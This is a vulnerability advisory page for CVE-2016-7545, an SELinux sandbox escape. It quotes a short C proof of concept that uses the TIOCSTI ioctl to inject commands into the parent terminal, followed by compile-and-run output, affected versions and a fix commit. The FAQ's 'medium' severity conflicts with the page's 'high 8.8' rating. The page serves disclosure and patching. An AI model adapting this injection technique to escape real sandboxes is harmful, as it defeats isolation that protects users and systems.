high
8.8
CWE
284
Advisory Published
CVE Published
Updated

CVE-2016-7545

First published: Thu Sep 22 2016(Updated: )

Hi, When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox. $ cat test.c #include &lt;unistd.h&gt; #include &lt;sys/ioctl.h&gt; int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); execlp("/bin/id", "id", NULL); } $ gcc test.c -o test $ /bin/sandbox ./test id uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176 [saken@ghetto ~]$ id &lt;------ did not type this uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 This is similar to <a href="https://access.redhat.com/security/cve/CVE-2016-2568">CVE-2016-2568</a>, <a href="https://access.redhat.com/security/cve/CVE-2016-2779">CVE-2016-2779</a>, etc. Thanks, Federico Bento.

Credit: cve@mitre.org

Affected SoftwareAffected VersionHow to fix
debian/policycoreutils
3.1-3
3.4-1
3.5-2
SELinux
Fedora=25
Red Hat Enterprise Linux Desktop=6.0
Red Hat Enterprise Linux Desktop=7.0
Red Hat Enterprise Linux HPC Node=6.0
Red Hat Enterprise Linux HPC Node=7.0
Red Hat Enterprise Linux Server=6.0
Red Hat Enterprise Linux Server=7.0
Red Hat Enterprise Linux Server=7.3
Red Hat Enterprise Linux Workstation=6.0
Red Hat Enterprise Linux Workstation=7.0

Remedy

https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Frequently Asked Questions

  • What is the severity of CVE-2016-7545?

    CVE-2016-7545 is classified as a medium severity vulnerability due to its potential to allow sandbox escape.

  • How do I fix CVE-2016-7545?

    To mitigate CVE-2016-7545, update the policycoreutils package to the versions 3.1-3, 3.4-1, or 3.5-2.

  • Which systems are affected by CVE-2016-7545?

    CVE-2016-7545 affects various distributions including Red Hat Enterprise Linux 6.0, 7.0, and SELinux.

  • What type of attack does CVE-2016-7545 enable?

    CVE-2016-7545 enables an attacker to escape from a sandbox environment to the parent session.

  • Is there a known exploit for CVE-2016-7545?

    Yes, CVE-2016-7545 can be exploited using the TIOCSTI ioctl command to manipulate terminal input.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203